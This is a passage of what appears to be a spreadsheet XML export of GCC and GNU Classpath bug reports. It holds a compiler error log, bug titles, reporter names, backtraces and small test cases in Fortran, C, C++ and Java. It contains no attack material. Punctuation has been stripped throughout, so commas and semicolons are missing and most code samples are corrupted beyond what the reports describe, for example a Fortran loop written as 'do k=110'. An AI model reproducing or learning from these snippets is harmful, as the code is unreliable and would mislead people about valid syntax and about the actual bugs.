backoff.cc:392: `mask_bin_count' was not declared in this scope
backoff.cc:392: `mask_bin_sc' was not declared in this scope
backoff.cc:392: ISO C++ forbids declaration of `initialize_M_I_B' with no type
backoff.cc:392: redefinition of `int initialize_M_I_B'
backoff.cc:355: `int initialize_M_I_B' previously defined here
backoff.cc:392: initializer list being treated as compound expression
backoff.cc:394: parse error before if
backoff.cc:397: `data' was not declared in this scope
backoff.cc:397: `hi' was not declared in this scope
backoff.cc:397: `heldout' was not declared in this scope
backoff.cc:397: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:397: redefinition of `int cforeach'
backoff.cc:352: `int cforeach' previously defined here
backoff.cc:397: initializer list being treated as compound expression
backoff.cc:397: syntax error before '{' token
backoff.cc:399: syntax error before '' token
backoff.cc:400: `initial_mask' was not declared in this scope
backoff.cc:400: ISO C++ forbids declaration of `forwardProb' with no type
backoff.cc:400: assignment (not initialization) in declaration
backoff.cc:402: syntax error before '::' token
backoff.cc:404: syntax error before '!=' token
backoff.cc:406: syntax error before '=' token
backoff.cc:407: `fp' was not declared in this scope
backoff.cc:407: ISO C++ forbids declaration of `assert' with no type
backoff.cc:407: redefinition of `int assert'
backoff.cc:308: `int assert' previously defined here
backoff.cc:408: syntax error before '(' token
backoff.cc:409: syntax error before '=' token
backoff.cc:410: syntax error before '&amp;' token
backoff.cc:418: syntax error before '::' token
backoff.cc:419: `Fs' was not declared in this scope
backoff.cc:419: `li' was not declared in this scope
backoff.cc:419: `s' was not declared in this scope
backoff.cc:419: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:419: redefinition of `int cforeach'
backoff.cc:397: `int cforeach' previously defined here
backoff.cc:419: initializer list being treated as compound expression
backoff.cc:419: syntax error before '{' token
backoff.cc:421: `mi' was not declared in this scope
backoff.cc:421: syntax error before '+=' token
backoff.cc:423: `mi' was not declared in this scope
backoff.cc:423: `mmsi' was not declared in this scope
backoff.cc:423: ISO C++ forbids declaration of `assert' with no type
backoff.cc:423: redefinition of `int assert'
backoff.cc:407: `int assert' previously defined here
backoff.cc:424: parse error before '}' token
backoff.cc:429: `prob' was not declared in this scope
backoff.cc:429: ISO C++ forbids declaration of `assert' with no type
backoff.cc:429: redefinition of `int assert'
backoff.cc:423: `int assert' previously defined here
backoff.cc:431: syntax error before '=' token
backoff.cc:432: syntax error before '-=' token
backoff.cc:436: syntax error before '' token
backoff.cc:439: syntax error before '!=' token
backoff.cc:441: syntax error before '=' token
backoff.cc:442: `fp' was not declared in this scope
backoff.cc:442: ISO C++ forbids declaration of `assert' with no type
backoff.cc:442: redefinition of `int assert'
backoff.cc:429: `int assert' previously defined here
backoff.cc:443: syntax error before '(' token
backoff.cc:444: syntax error before '=' token
backoff.cc:445: syntax error before '&amp;' token
backoff.cc:446: syntax error before '&amp;' token
backoff.cc:447: syntax error before '=' token
backoff.cc:450: syntax error before '.' token
backoff.cc:454: syntax error before '.' token
backoff.cc:457: syntax error before '::' token
backoff.cc:458: syntax error before '::' token
backoff.cc:459: `Fs' was not declared in this scope
backoff.cc:459: `li' was not declared in this scope
backoff.cc:459: `s' was not declared in this scope
backoff.cc:459: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:459: redefinition of `int cforeach'
backoff.cc:419: `int cforeach' previously defined here
backoff.cc:459: initializer list being treated as compound expression
backoff.cc:459: syntax error before '{' token
backoff.cc:461: `si' was not declared in this scope
backoff.cc:461: `sc' was not declared in this scope
backoff.cc:461: ISO C++ forbids declaration of `assert' with no type
backoff.cc:461: redefinition of `int assert'
backoff.cc:442: `int assert' previously defined here
backoff.cc:462: syntax error before '=' token
backoff.cc:463: syntax error before '+=' token
backoff.cc:464: syntax error before '++' token
backoff.cc:466: `mi' was not declared in this scope
backoff.cc:466: `mmsi' was not declared in this scope
backoff.cc:466: ISO C++ forbids declaration of `assert' with no type
backoff.cc:466: redefinition of `int assert'
backoff.cc:461: `int assert' previously defined here
backoff.cc:467: `si' was not declared in this scope
backoff.cc:467: `sc' was not declared in this scope
backoff.cc:467: ISO C++ forbids declaration of `assert' with no type
backoff.cc:467: redefinition of `int assert'
backoff.cc:466: `int assert' previously defined here
backoff.cc:468: `m' was not declared in this scope
backoff.cc:468: ISO C++ forbids declaration of `backwardProb' with no type
backoff.cc:468: `bp' was not declared in this scope
backoff.cc:468: assignment (not initialization) in declaration
backoff.cc:469: parse error before '}' token
backoff.cc:470: `backwardProb' was not declared in this scope
backoff.cc:470: `initial_mask' was not declared in this scope
backoff.cc:470: `afind' was not declared in this scope
backoff.cc:470: `prob' was not declared in this scope
backoff.cc:470: `fabs' was not declared in this scope
backoff.cc:470: `prob' was not declared in this scope
backoff.cc:470: ISO C++ forbids declaration of `assert' with no type
backoff.cc:470: redefinition of `int assert'
backoff.cc:467: `int assert' previously defined here
backoff.cc:471: parse error before '}' token
backoff.cc:473: `M_I_B' was not declared in this scope
backoff.cc:473: `msbi' was not declared in this scope
backoff.cc:473: `mask_bin_binnedState' was not declared in this scope
backoff.cc:473: ISO C++ forbids declaration of `foreach' with no type
backoff.cc:473: initializer list being treated as compound expression
backoff.cc:473: syntax error before '{' token
backoff.cc:475: syntax error before '&amp;' token
backoff.cc:476: syntax error before '=' token
backoff.cc:477: `I_B' was not declared in this scope
backoff.cc:477: `sbi' was not declared in this scope
backoff.cc:477: `bin_binnedState' was not declared in this scope
backoff.cc:477: ISO C++ forbids declaration of `foreach' with no type
backoff.cc:477: redefinition of `int foreach'
backoff.cc:473: `int foreach' previously defined here
backoff.cc:477: initializer list being treated as compound expression
backoff.cc:477: syntax error before '{' token
backoff.cc:479: syntax error before '&amp;' token
backoff.cc:480: syntax error before '=' token
backoff.cc:481: `Fs' was not declared in this scope
backoff.cc:481: `li' was not declared in this scope
backoff.cc:481: `sc' was not declared in this scope
backoff.cc:482: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:482: redefinition of `int cforeach'
backoff.cc:459: `int cforeach' previously defined here
backoff.cc:482: initializer list being treated as compound expression
backoff.cc:482: syntax error before '+=' token
backoff.cc:483: syntax error before '+=' token
backoff.cc:484: syntax error before '.' token
backoff.cc:485: syntax error before '.' token
backoff.cc:486: syntax error before '::' token
backoff.cc:487: `Fs' was not declared in this scope
backoff.cc:487: `li' was not declared in this scope
backoff.cc:487: `s' was not declared in this scope
backoff.cc:487: ISO C++ forbids declaration of `foreach' with no type
backoff.cc:487: redefinition of `int foreach'
backoff.cc:477: `int foreach' previously defined here
backoff.cc:487: initializer list being treated as compound expression
backoff.cc:487: syntax error before '{' token
backoff.cc:489: ISO C++ forbids declaration of `li' with no type
backoff.cc:489: `ci' was not declared in this scope
backoff.cc:489: `smoothing_constant' was not declared in this scope
backoff.cc:489: `sum' was not declared in this scope
backoff.cc:490: parse error before '}' token
backoff.cc:491: `ci' was not declared in this scope
backoff.cc:491: `sc' was not declared in this scope
backoff.cc:491: ISO C++ forbids declaration of `assert' with no type
backoff.cc:491: redefinition of `int assert'
backoff.cc:470: `int assert' previously defined here
backoff.cc:492: parse error before '}' token
backoff.cc:495: syntax error before '=' token
backoff.cc:507: syntax error before '::' token
backoff.cc:513: syntax error before '&amp;' token
backoff.cc:514: syntax error before '(' token
backoff.cc:515: syntax error before '&amp;' token
backoff.cc:517: syntax error before '=' token
backoff.cc:519: syntax error before '::' token
backoff.cc:521: `masks' was not declared in this scope
backoff.cc:521: `i' was not declared in this scope
backoff.cc:521: `subms' was not declared in this scope
backoff.cc:521: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:521: redefinition of `int cforeach'
backoff.cc:482: `int cforeach' previously defined here
backoff.cc:521: initializer list being treated as compound expression
backoff.cc:521: syntax error before '{' token
backoff.cc:523: syntax error before '+=' token
backoff.cc:525: `b' was not declared in this scope
backoff.cc:525: ISO C++ forbids declaration of `assert' with no type
backoff.cc:525: redefinition of `int assert'
backoff.cc:491: `int assert' previously defined here
backoff.cc:527: `m' was not declared in this scope
backoff.cc:527: ISO C++ forbids declaration of `dejavu' with no type
backoff.cc:527: `p' was not declared in this scope
backoff.cc:527: assignment (not initialization) in declaration
backoff.cc:529: parse error before if
lugha [4] % g  [Kbzip2 -9 backoff.ii
lugha [5] % ^D  exit
Script done on Sun Nov 12 10:14:42 2000
Release:
gcc 2.97 20001106 (experimental)
Environment:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with:  --enable-shared --enable-languages=c++
gcc version 2.97 20001106 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c++ -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ backoff.cc backoff.ii
GNU CPP version 2.97 20001106 (experimental) (cpplib) (i386 Linux/ELF)</t>
  </si>
  <si>
    <t>mark_johnson</t>
  </si>
  <si>
    <t>GCC-62131</t>
  </si>
  <si>
    <t>[4.9/5 Regression] OpenMP: Subobject of an allocatable array not allowed in OMP ATOMIC</t>
  </si>
  <si>
    <t>layzrc raised this problem on comp.lang.fortran https://groups.google.com/forum/#!topic/comp.lang.fortran/lVzeHW_X1aw
module storage
  integerallocatable :: nerrs(::)
end module
program atomic
  use storage
    allocate(nerrs(1010))
!$omp parallel do
    do k=110
      call uperrs(k1)
    enddo
!$omp end parallel do
  stop
contains
  subroutine uperrs(iio)
  integerintent(in) :: iio
!$omp atomic
    nerrs(iio)=nerrs(iio)+1
  end subroutine
end
&gt;gfortran -fopenmp atomic.f90
atomic.f90:18.29:
    nerrs(iio)=nerrs(iio)+1
                             1
Error: !$OMP ATOMIC with ALLOCATABLE variable at (1)
I believe this is a  wrong and causes a bad regression because `nerrs(iio)` is not an allocatable variable. I believe the section 2.12.6 of OpenMP 4 concerns situations when the whole variable being updated or assigned is allocatable (e.g. allocatable scalars) and it causes possible re-allocation.</t>
  </si>
  <si>
    <t>GCC-31188</t>
  </si>
  <si>
    <t>[4.2 only] ICE on vector subscript of a parameter array</t>
  </si>
  <si>
    <t>The following code triggers the gcc_assert (begin-&gt;expr_type == EXPR_ARRAY) assertion in find_array_section (in expr.c):
module foo_mod
implicit none
character (len=1) parameter :: letters(2) = (/ab/)
contains
subroutine concat(ivec)
integer intent(in)  :: ivec(:)
write (**) a // letters(ivec)
end subroutine concat
end module foo_mod
I'm not sure it should end up in that function however and I'm not sure why we end up here.</t>
  </si>
  <si>
    <t>GCC-47037</t>
  </si>
  <si>
    <t>465.tonto Segmentation Fault in memset with -fcaller-saves (default at -O2 or higher)</t>
  </si>
  <si>
    <t>We have a new system and I saw a segmentation fault in memset (with current gcc trunk).
gfortran -O2 -static (-march=generic64):
(gdb) r &lt; stdin
Starting program: /local/home/chfang/cpu2006/benchspec/CPU2006/465.tonto/build/build_base_cfangO3.0000/tonto &lt; stdin
Program received signal SIGSEGV Segmentation fault.
memset () at ../sysdeps/x86_64/memset.S:496
496	../sysdeps/x86_64/memset.S: No such file or directory.
	in ../sysdeps/x86_64/memset.S
Current language:  auto
The current source language is auto currently asm.
(gdb) bt
#0  memset () at ../sysdeps/x86_64/memset.S:496
#1  0x2020202020202020 in ?? ()
#2  0x2020202020202020 in ?? ()
#3  0x2020202020202020 in ?? ()
#4  0x2020202020202020 in ?? ()
#5  0x2020202020202020 in ?? ()
#6  0x2020202020202020 in ?? ()
#7  0x2020202020202020 in ?? ()
#8  0x2020202020202020 in ?? ()
#9  0x2020202020202020 in ?? ()
#10 0x2020202020202020 in ?? ()
#11 0x2020202020202020 in ?? ()
#12 0x2020202020202020 in ?? ()
#13 0x2020202020202020 in ?? ()
#14 0x2020202020202020 in ?? ()
#15 0x2020202020202020 in ?? ()
#16 0x2020202020202020 in ?? ()
#17 0x2020202020202020 in ?? ()
#18 0x0000000000b613a0 in ?? ()
#19 0x2020202020202020 in ?? ()
#20 0x0000000120202020 in ?? ()
#21 0x2020202000000001 in ?? ()
#22 0x2020202020202020 in ?? ()
#23 0x0000000000b60eb0 in ?? ()
#24 0x0000000000b60b20 in ?? ()
#25 0x0000000000000080 in ?? ()
#26 0x0000000000000001 in ?? ()
#27 0x0000000000411d6c in read_label (self=...) at atom.fppized.f90:1155
#28 0x0000000000415318 in process_keyword (self=... keyword= _keyword=-11776) at atom.fppized.f90:1028
#29 0x0000000000415b74 in process_keys (self=...) at atom.fppized.f90:1440
#30 0x000000000042d689 in data_length (self=) at atomvec.fppized.f90:1388
#31 0x000000000042ed3a in read_data (self=... ignore_braces=Cannot access memory at address 0x0
) at atomvec.fppized.f90:1351
#32 0x00000000004314f8 in read_list_keywords (self=...) at atomvec.fppized.f90:1306
#33 0x00000000006256e5 in read_atoms (self=...) at mol.fppized.f90:9579
#34 0x0000000000647d3e in process_keyword (self=0xb5b490 keyword=atom _keyword=) at mol_main.fppized.f90:3836
#35 0x0000000000648418 in read_keywords (self=0xb5b490) at mol_main.fppized.f90:3807
#36 0x0000000000648489 in main (self=0xb5b490) at mol_main.fppized.f90:3744
#37 0x00000000006b9ea2 in run_mol () at run_mol.fppized.f90:125
#38 main () at run_mol.fppized.f90:22
#39 0x0000000000000000 in ?? ()</t>
  </si>
  <si>
    <t>CLASSPATH-24721</t>
  </si>
  <si>
    <t>CompositeView modelToView problems</t>
  </si>
  <si>
    <t>Run the test case.  About 1/2 of the time this error is shown:
java.lang.AssertionError: No child views found where child views are expected. pos = 0 bias = forward
   at javax.swing.text.CompositeView.modelToView (CompositeView.java:234)
   at javax.swing.text.CompositeView.modelToView (CompositeView.java:224)
   at javax.swing.plaf.basic.BasicTextUI$RootView.modelToView (BasicTextUI.java:275)
   at javax.swing.plaf.basic.BasicTextUI.modelToView (BasicTextUI.java:984)
   at javax.swing.plaf.basic.BasicTextUI.modelToView (BasicTextUI.java:959)
   at javax.swing.text.JTextComponent.modelToView (JTextComponent.java:1490)
   at javax.swing.text.DefaultCaret.setVisible (DefaultCaret.java:830)
   at javax.swing.text.DefaultCaret.focusGained (DefaultCaret.java:417)
   at java.awt.AWTEventMulticaster.focusGained (AWTEventMulticaster.java:260)
   at java.awt.Component.processFocusEvent (Component.java:3045)
   at java.awt.Component.processEvent (Component.java:2966)
   at java.awt.Container.processEvent (Container.java:908)
   at java.awt.Component.dispatchEventImpl (Component.java:4846)
   at java.awt.Container.dispatchEventImpl (Container.java:1647)
   at java.awt.Component.dispatchEvent (Component.java:2342)
   at java.awt.KeyboardFocusManager.redispatchEvent (KeyboardFocusManager.java:1111)
   at java.awt.DefaultKeyboardFocusManager.dispatchEvent (DefaultKeyboardFocusManager.java:219)
   at java.awt.EventDispatchThread.run (EventDispatchThread.java:74)
And this happens with other similar test programs.</t>
  </si>
  <si>
    <t>GCC-30938</t>
  </si>
  <si>
    <t>Bootstrap fails on x86_64 for -ftree-vectorize</t>
  </si>
  <si>
    <t>-ftree-vectorize bootstrap segfaults on x86_64 in:
0x000000000098ecf9 in vect_is_simple_use (operand=0x2aaab01533c0 loop_vinfo=0x156f0b0 def_stmt=0x7fff4264e488 
    def=0x7fff4264e490 dt=0x7fff4264e488) at ../../gcc-svn/trunk/gcc/tree-vectorizer.c:1729
1729      switch (TREE_CODE (*def_stmt))
(gdb) bt
#0  0x000000000098ecf9 in vect_is_simple_use (operand=0x2aaab01533c0 loop_vinfo=0x156f0b0 def_stmt=0x7fff4264e488 
    def=0x7fff4264e490 dt=0x7fff4264e488) at ../../gcc-svn/trunk/gcc/tree-vectorizer.c:1729
#1  0x0000000000cf8b95 in vectorizable_call (stmt=0x2aaaaee70ed0 bsi=0x0 vec_stmt=0x0)
    at ../../gcc-svn/trunk/gcc/tree-vect-transform.c:1847
#2  0x0000000000ce602d in vect_analyze_operations (loop_vinfo=0x156f0b0) at ../../gcc-svn/trunk/gcc/tree-vect-analyze.c:376
#3  0x0000000000ced78d in vect_analyze_loop (loop=0x156f480) at ../../gcc-svn/trunk/gcc/tree-vect-analyze.c:2727
#4  0x0000000000990d90 in vectorize_loops () at ../../gcc-svn/trunk/gcc/tree-vectorizer.c:2217
#5  0x0000000000919053 in tree_vectorize () at ../../gcc-svn/trunk/gcc/tree-ssa-loop.c:183
This failure happens when compiling i386.c in function classify_argument.
To reproduce this failure run make with BOOT_CFLAGS=-O2 -ftree-vectorize.</t>
  </si>
  <si>
    <t>CLASSPATH-22870</t>
  </si>
  <si>
    <t>deserialisation fails on non-classpath object.</t>
  </si>
  <si>
    <t>I tried to deserialize a stream coming from a Sun JVM (which means a good stream) and got this exception:
java.lang.ClassNotFoundException: pvr/net/ServiceEvent
   at java.lang.VMClassLoader.loadClass (Native Method)
   at java.lang.Class.forName (Class.java:210)
   at java.io.ObjectInputStream.resolveClass (ObjectInputStream.java:749)
   at java.io.ObjectInputStream.readClassDescriptor (ObjectInputStream.java:530)
   at java.io.ObjectInputStream.readObject (ObjectInputStream.java:228)
   at java.io.ObjectInputStream.readObject (ObjectInputStream.java:275)
   at pvr.net.IPV4Master$IPV4Connection.send (IPV4Master.java:887)
   ...6 more
Some printlines in the ObjectInputStream.java told me that the class.forName was called with a 'null' as classloader which IIRC is not going to find classes that are in my classpath.  (right?)
Which makes the bug that the currentLoader() method returned null.
I ran using jamvm 1.2.4 and current classpath CVS.</t>
  </si>
  <si>
    <t>GCC-52507</t>
  </si>
  <si>
    <t>[avr]: movmem loop for __memx address space uses wrong loop label</t>
  </si>
  <si>
    <t>The __movmemx_hi and __movmemx_qi functions from libgcc use an incorrect loop label for the RAM-copy part of their code.
Effect will be that after the first byte the read will be from Flash and not from RAM.</t>
  </si>
  <si>
    <t>GCC-4789</t>
  </si>
  <si>
    <t>[DJGPP] preprocessing fortran files by cpp with extension .f</t>
  </si>
  <si>
    <t>compiling fortran files with extension .f which need
to be preprocessed (worked with 2.9xx).
the command  g77 -x f77-cpp-input -c anyfile.f
gives:
c:/djgpp/lib/gcc-lib/djgpp/3.02/tradcpp0.exe: Invalid option `-remap'
don't know if this bug belongs to gcc or to the djgpp-port.
Release:
GCC 3.02
Environment:
DJGPP DOS-box under windows nt 4.0</t>
  </si>
  <si>
    <t>bonner</t>
  </si>
  <si>
    <t>GCC-36087</t>
  </si>
  <si>
    <t>[4.4 Regression] test failures between revs. 134696 and 134717</t>
  </si>
  <si>
    <t>Comparing http://gcc.gnu.org/ml/gcc-testresults/2008-04/msg02061.html and
http://gcc.gnu.org/ml/gcc-testresults/2008-04/msg02120.html shows the following new failures on powerpc-apple-darwin*:
FAIL: gcc.dg/memcpy-1.c scan-tree-dump-times optimized nasty_local 0
FAIL: gcc.dg/pr35729.c scan-rtl-dump-times loop2_invariant Decided to move invariant 0
ERROR: gcc.dg/var-expand3.c: error executing dg-final: no files matched glob pattern var-expand3.c.[0-9][0-9][0-9]r.loop2_unroll
UNRESOLVED: gcc.dg/var-expand3.c: error executing dg-final: no files matched glob pattern var-expand3.c.[0-9][0-9][0-9]r.loop2_unroll
between between revisions 134696 and 134717. The possible culprits seem to be 134697 (most likely)
Author:	uros
Date:	Sat Apr 26 13:43:13 2008 UTC (4 days ago)
Log Message:	
        * config/i386/i386.md (fix_trunc_i387_fisttp_with_temp): Use 'X'
        constraint for operand 2 when operand 0 is memory operand.
        (fix_truncdi_i387_with_temp): : Use 'X' constraint for operand 4 when
        operand 0 is memory operand.
        (fix_trunc_i387_with_temp): Ditto.
        (*floatsi2_vector_mixed_with_temp): Use 'X' constraint for
        operand 2 when operand 1 is memory operand.
        (*float2_mixed_with_temp): Ditto.
        (*floatsi2_vector_sse_with_temp): Ditto.
        (*float2_sse_with_temp): Ditto.
        (*float2_i387_with_temp): Ditto.
        (floatdi2_i387_with_xmm): Use 'X' constraint for
        operands 23 and 4 when operand 1 is memory operand.
        (fistdi2_with_temp): Use 'X' constraint for operand 2 when operand 0
        is memory operand.
        (fistdi2_floor_with_temp): Ditto.
        (fist2_floor_with_temp): Ditto.
        (fistdi2_ceil_with_temp): Ditto.
        (fist2_ceil_with_temp): Ditto.
        (*truncdfsf_fast_mixed): Merge alternatives 0 and 1.
or 134714
Author:	simonb
Date:	Sat Apr 26 16:59:38 2008 UTC (3 days 20 hours ago)
Log Message:	
       PR c/35652
       * builtins.c (c_strlen): Suppressed multiple warnings that can occur
       with propagated string constants.</t>
  </si>
  <si>
    <t>GCC-40590</t>
  </si>
  <si>
    <t>namespace namespace broken in CNI</t>
  </si>
  <si>
    <t>gcj does not mangle names correctly.
In particular when a member name is a C++ keyword $ is appended to the name.  However this is results in an illegal mangled name so it is not possible to refer to the member from CNI code.
Also the set of C++ keywords in gjavah is different from the set in gcj.
Also types are not checked for C++ keywords so javax.xml.namespace.* cannot be referenced from CNI code.</t>
  </si>
  <si>
    <t>GCC-6987</t>
  </si>
  <si>
    <t>failure at  s390_final_chunkify when more than 4K bytes for globals</t>
  </si>
  <si>
    <t>----------------------- gen.pl -----------------------------
$max = $ENV{MAX} || 4096
foreach $i (0 .. $max) {
   print extern long i_$i\n
}
print void test()\n{\n
foreach $i (0 .. $max) {
   print   i_$i = $i\n
}
print }\n
------------------------------------------------------------
linux1:~ # MAX=1024 perl gen.pl &gt; gen.c cc -c gen.c
/tmp/ccQk1Bdb.s: Assembler messages:
/tmp/ccQk1Bdb.s:5141: Error: operand out of range (4096 not between 0 and 4095)
linux1:~ # MAX=3243 perl gen.pl &gt; gen.c cc -c gen.c
(insn 2565 17766 2568 (set (mem/f:SI (reg:SI 1 %r1) 0)
        (reg:SI 2 %r2)) 48 {*movsi} (nil)
    (nil))
(insn 16223 16220 25962 (set (reg:SI 1 %r1)
        (mem/u:SI (symbol_ref/u:SI (*.LC3243)) 0)) 48 {*movsi} (nil)
    (expr_list:REG_EQUAL (symbol_ref:SI (i_3243))
        (nil)))
s390 multiple literalpool support:
 No code label between this insn 1800 9804gen.c: In function `test':
gen.c:6491: Internal compiler error in `s390_final_chunkify' at config/s390/s390.c:1888
Please submit a full bug report.
See  for instructions.
linux1:~ #
linux1:~ # cc -v
Reading specs from /usr/lib/gcc-lib/s390-suse-linux/2.95.3/specs
gcc version 2.95.3 20010315 (SuSE)
linux1:/proc # cat version
Linux version 2.4.7-SuSE-SMP (root@k_deflt.suse.de) (gcc version 2.95.3 20010315 (SuSE)) #1 SMP Fri Oct 26 00:53:12 GMT 2001
This is a critical problem holding up our system build process.
Release:
gcc version 2.95.3 20010315 (SuSE)
Environment:
cat /proc/version
Linux version 2.4.7-SuSE-SMP (root@k_deflt.suse.de) (gcc version 2.95.3 20010315 (SuSE)) #1 SMP Fri Oct 26 00:53:12 GMT 2001</t>
  </si>
  <si>
    <t>mark.fallon</t>
  </si>
  <si>
    <t>GCC-4536</t>
  </si>
  <si>
    <t>ostream seekp &amp; istream seekg should scope failbit</t>
  </si>
  <si>
    <t>ostream's seekp and istream's seekg methods need to use failbit as  `ios_base::failbit'.
It may be worth noting that the setting of failbit goes in line with the change for library DR #129.  The standard pre-DR edits does not include the clause in $27.6.2.4(2) regarding the setting of failbit.
Release:
CVS tree</t>
  </si>
  <si>
    <t>GCC-83513</t>
  </si>
  <si>
    <t>[8 Regression] ICE: qsort checking failed (error: qsort comparator non-negative on sorted output: 3) in fill_vec_av_set in selective scheduler</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20171217 snapshot (r255766) ICEs when compiling the following snippet w/ -O1 (-O2 -Os) -fschedule-insns -fselective-scheduling -fno-guess-branch-probability:
void
oh (long int qc short int de)
{
  {
    long int uf = 0
    int *xu *gx = 
 p6:
    *gx = (qc == 0) ? -1 : (qc - uf)
    if (de == *gx)
      {
        ++*xu
        de = *xu
      }
    else
      de = qc
  }
  goto p6
}
% gcc-8.0.0-alpha20171217 -O1 -fschedule-insns -fselective-scheduling -fno-guess-branch-probability -c -w vugfco5g.c                                                 
vugfco5g.c: In function 'oh':
vugfco5g.c:20:1: error: qsort comparator non-negative on sorted output: 3
 }
 ^
during RTL pass: sched1
vugfco5g.c:20:1: internal compiler error: qsort checking failed
0x829340 qsort_chk_error
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/vec.c:222
0x8293c7 qsort_chk(void* unsigned long unsigned long int (*)(void const* void const*))
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/vec.c:274
0xd069c4 vec::qsort(int (*)(void const* void const*))
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/vec.h:1050
0xd069c4 vec::qsort(int (*)(void const* void const*))
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/vec.h:1812
0xd069c4 fill_vec_av_set
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sel-sched.c:3725
0xd089ea fill_ready_list
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sel-sched.c:4022
0xd089ea find_best_expr
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sel-sched.c:4382
0xd089ea fill_insns
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sel-sched.c:5539
0xd0ae50 schedule_on_fences
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sel-sched.c:7356
0xd0ae50 sel_sched_region_2
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sel-sched.c:7494
0xd0c588 sel_sched_region_1
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sel-sched.c:7536
0xd0c588 sel_sched_region(int)
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sel-sched.c:7637
0xd0d5e1 run_selective_scheduling()
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sel-sched.c:7713
0xcedadd rest_of_handle_sched
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sched-rgn.c:3715
0xcedadd execute
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/sched-rgn.c:3825</t>
  </si>
  <si>
    <t>GCC-46102</t>
  </si>
  <si>
    <t>[4.8/4.9/5 Regression] ICE: SIGSEGV in dwarf2out_finish (dwarf2out.c:8490) with -feliminate-dwarf2-dups when using precompiled headers</t>
  </si>
  <si>
    <t>----- testcase.H -----
/* NOTHING */
----------------------
----- testcase.C -----
#include testcase.H
int i
----------------------
Generate files:
echo  &gt; testcase.H
echo '#include testcase.H' &gt; testcase.C
echo 'int i' &gt;&gt; testcase.C
Compile:
(testcase.H can be compiled with -feliminate-dwarf2-dups it still fails)
$ gcc -g testcase.H
$ gcc -g testcase.C -feliminate-dwarf2-dups
testcase.C:2:6: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Related valgrind output:
==21702== Invalid read of size 8
==21702==    at 0x74AB61: dwarf2out_finish (dwarf2out.c:8490)
==21702==    by 0x9C6A15: toplev_main (toplev.c:961)
==21702==    by 0x658ABBC: (below main) (in /lib64/libc-2.11.2.so)
==21702==  Address 0x20 is not stack'd malloc'd or (recently) free'd
==21702== 
testcase.C:2:6: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r165719 - crash
r158095 - crash
r153685 - crash
4.1.2 4.2.4 4.3.5 4.4.5 - crash</t>
  </si>
  <si>
    <t>GCC-658</t>
  </si>
  <si>
    <t>ICE #123 on misplaced letter.. and some other things</t>
  </si>
  <si>
    <t>I get an ICE #123 on the code given.
A letter (or a bit more like 'a(b)') is put in a wrong place and then the surroundings have to be right.
Release:
gcc version 2.96 20000731 (experimental)
How-To-Repeat:
struct S {
    S(undef_type s) {} // 'short' instead of 'undef_type' gives SEGV.
    S(int i) a {} // &lt;-- notice the 'a'
}
class C {
    void f()
}
void C::f() {}</t>
  </si>
  <si>
    <t>GCC-78623</t>
  </si>
  <si>
    <t>non-dependent name treated as if it were dependent requiring use of template keyword</t>
  </si>
  <si>
    <t>This example fails to compile on the marked line - gcc requires me to write result.template foo() which shouldn't be necessary. Nothing here is dependent. 
If I declared result as an X rather than with auto the code compiles fine.
struct X { 
    template 
    void foo()
}
struct Base {
    X get()
}
template 
struct Derived : Base
{
    void foo() {
        auto result = Base::get()
        result.foo() // (*)
    }   
}
template struct Derived</t>
  </si>
  <si>
    <t>GCC-268</t>
  </si>
  <si>
    <t>Bug report: internal compiler error on (incorrect) array initialization</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Wed 31 May 2000 13:09:45 +0200
 Bug report: internal compiler error on (incorrect) array initialization
 $ cat yoho.cc
 main()
 {
    int *a = new int[ 4 ] = { {1 2} {3 4} }
 } 
 $ g++ yoho.cc
 yoho.cc: In function `int main()':
 yoho.cc:4: Internal compiler error.
 yoho.cc:4: Please submit a full bug report.
 yoho.cc:4: See 
 for instructions.
 $ g++ --version
 2.95.2
 $ uname -mrsv
 Linux 2.2.7 #13 Tue Mar 7 10:30:20 CET 2000 i686
 Hope this helps
 John Schavemaker
 -- 
 dr. J.G.M. Schavemaker
 Electro-Optical Systems TNO Physics and Electronics Laboratory          
 P.O. Box 96864 NL-2509 JG The Hague The Netherlands 
 Phone: +31 70 374 0860 Fax: +31 70 374 0654 Email:
 Schavemaker@fel.tno.nl
Release:
